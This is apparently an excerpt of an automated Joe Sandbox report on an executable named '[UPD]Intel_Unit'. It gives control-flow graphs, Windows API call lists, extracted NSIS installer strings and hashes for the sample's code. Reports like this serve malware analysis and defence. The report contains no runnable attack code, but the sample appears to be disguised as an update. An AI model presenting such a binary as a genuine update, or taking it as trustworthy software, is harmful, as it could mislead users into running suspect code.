                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                              • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                                                              • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                                                                                                                                              • ShowWindow.USER32(?), ref: 004054D2
                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 004054E6
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                                                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                                                                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00405757
                                                                                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                                                                                                                                              • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                              • String ID: @rD
                                                                                                                                                                                                              • API String ID: 3282139019-3814967855
                                                                                                                                                                                                              • Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                                                                                                                                              • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                              • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                              • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                              • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                              • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                              • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                              • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                              • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                              • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                              • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                              • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                              • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                              • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                              • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                              • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                              • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                              • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                              • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                              • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                              • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                              • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                              • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                              • API String ID: 2872004960-3619442763
                                                                                                                                                                                                              • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                                                                              • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                                                                                                                                                • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                                                                                                                                              • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                                                                                                                                                • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                                                                                                                                              • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                                                                                                                                              • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                                                                                                                                              • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                              • API String ID: 608394941-1650083594
                                                                                                                                                                                                              • Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                                                                                                                                                              • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,ChapterFilmeJokeHeadquartersMistake,004CB0B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,ChapterFilmeJokeHeadquartersMistake,ChapterFilmeJokeHeadquartersMistake,00000000,00000000,ChapterFilmeJokeHeadquartersMistake,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                              • String ID: ChapterFilmeJokeHeadquartersMistake$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                                                                                                                              • API String ID: 4286501637-476247607
                                                                                                                                                                                                              • Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                                                                                                                                                              • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
